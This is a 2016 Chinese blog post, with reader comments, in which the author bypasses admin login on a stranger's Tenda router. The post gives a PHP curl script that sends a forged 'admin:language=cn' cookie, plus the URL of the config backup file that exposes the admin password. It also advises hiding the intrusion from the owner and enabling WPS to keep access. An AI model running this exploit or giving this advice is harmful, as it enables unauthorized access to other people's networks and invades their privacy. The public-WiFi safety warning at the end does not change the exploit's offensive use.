«

实测绕过腾达某型号路由器后台登陆认证,获得管理权限

时间:2016-4-28 16:36     作者:admin     分类: 技术文章


刚好今天住的地方网络出了问题,就打开手机随便搜索了一下附近的wifi,发现有个可以用钥匙链接,毫不犹豫地连接上去,故事就此展开了:

习惯性地在连接上陌生wifi后进一下后台,用浏览器打开网关,来到这个页面:http://192.168.0.1/login.asp点击查看原图

一看,感觉好眼熟啊,这个和之前在乌云看到的那个腾达漏洞很相似啊,为了验证一下,F12后切换到Network选项卡下面,重新请求一遍,发现从首页index.asp 301 跳转到 login.asp ,而且没有cookies,那么是否是真的是那个漏洞呢?利用php的curl写了个简单的脚本:

<?php 
echo "找到路由的备份文件就好了,密码就在里面。腾达的备份文件是RouterCfm.cfg。在工具的地址栏输入:http://192.168.0.1/cgi-bin/DownloadCfg/RouterCfm.cfg,然后点获取当前地址源码。http_passwd就是登陆密码".'<br>';
$headers = array(
    // 'GET /index.asp HTTP/1.1',
    'Host: 192.168.0.1',
    'Cookie: admin:language=cn;',

);
$url='http://192.168.0.1/index.asp';
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 120);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$result = curl_exec($ch);
curl_close($ch);
echo $result;
 ?>


运行后的结果如下:

点击查看原图

从图上看,基本上可以判断是成功了得,再ctrl+u :点击查看原图

开始很纳闷,为啥没有宽带账号/密码,初步判断是静态IP或者是动态获取IP,从图中可以看到wifi密码是八个8--88888888 ,把配置文件下载下来后就可以看到后台的登陆密码了:

5.png

http_passwd=后面的就是路由器后台登陆密码,当然,你也可以不下载配置文件,直接在后台修改登录密码,但是这样容易被路由器的所有者发现,不建议这样做,进入路由后,如果有wps功能,请帮他打开,哈哈,这样即使他改了密码,你通过wps还是很可以轻松的拿到密码---拿下路由器。更多的关于拿下路由器后的各种姿势,请看这篇文章:破解了你的路由密码后,我还可以这样做,绝对不是蹭你网这么简单

      这个漏洞在13年的时候就出来了,而且还有很多成品工具可以一键破解,可是这些厂家和我们的人民 没有多少安全意识,特别是在公共场合的wifi,朋友们在使用的时候,一定要注意,别在这些场所进行资金操作,或者是与个人隐私相关的操作,因为,谁也不知道咋某个角落是否有一个骇客正在监听或者嗅探 or 钓鱼呢? OK ,

标签: 路由器 wifi 攻击 渗透测试 黑客 钓鱼

版权所有:Mrxn's Blog
文章标题:实测绕过腾达某型号路由器后台登陆认证,获得管理权限
除非注明,文章均为 Mrxn's Blog 原创,请勿用于任何商业用途,转载请注明作者和出处 Mrxn's Blog

扫描二维码,在手机上阅读
评论:
avatar
3147 2018-12-25 20:47
但是,管理界面进去是192.168.0.1/login.html,用cookie方法好像进不去怎么弄。。。
commentator
Mrxn 2019-01-08 20:27
@3147:要看版本啊 如果版本是升级过了的 当然不行了啊
avatar
新人不懂 2016-10-29 11:03
有个问题不太懂,手机连上的wifi,怎么用电脑连上了操作路由器?
commentator
Mrxn 2016-11-25 13:40
@新人不懂:通过路由器的web端 或者是其他工具软件
avatar
老爷爷 2016-08-16 11:53
房东路由器被别人限速了   试过admin:language=cn不行啊
avatar
magicessay 2016-08-09 20:19
感谢楼主的分享,对我很有帮助。
avatar
。。 2016-06-12 15:19
厉害
avatar
五冶大学 2016-06-10 09:42
这个漏洞在13年的时候就出来了,而且还有很多成品工具可以一键破解,可是这些厂家和我们的人民 没有多少安全意识,特别是在公共场合的wifi,朋友们在使用的时候,一定要注意,别在这些场所进行资金操作,或者是与个人隐私相关的操作,因为,谁也不知道咋某个角落是否有一个骇客正在监听或者嗅探 or 钓鱼呢?
avatar
套图吧 2016-05-24 00:05
我也用腾达的路由 幸好附近没什么会电脑的 不安全了
avatar
蒸汽回收 2016-05-08 15:14
谢谢博主分享
commentator
Mrxn 2016-05-10 10:13
@蒸汽回收:不客气
avatar
惜亿博客 2016-05-02 10:21
方法好高级  不过一般破解wifi都是用wifi万能钥匙  直接就看了  方便点
commentator
Mrxn 2016-05-10 10:18
@惜亿博客:钥匙是方便 但是进去玩 更有趣 不是么--(对于我们来说:(!
avatar
奇草导航 2016-05-01 10:20
拿下路由器后的各种姿势。。。好专业的口吻。
难怪在进入mrxn.net时,浏览器提示,网站危险,不建议访问。
commentator
Mrxn 2016-05-10 10:22
@奇草导航:晕 什么浏览器 提示 我的GoogleIE 360极速都没有提示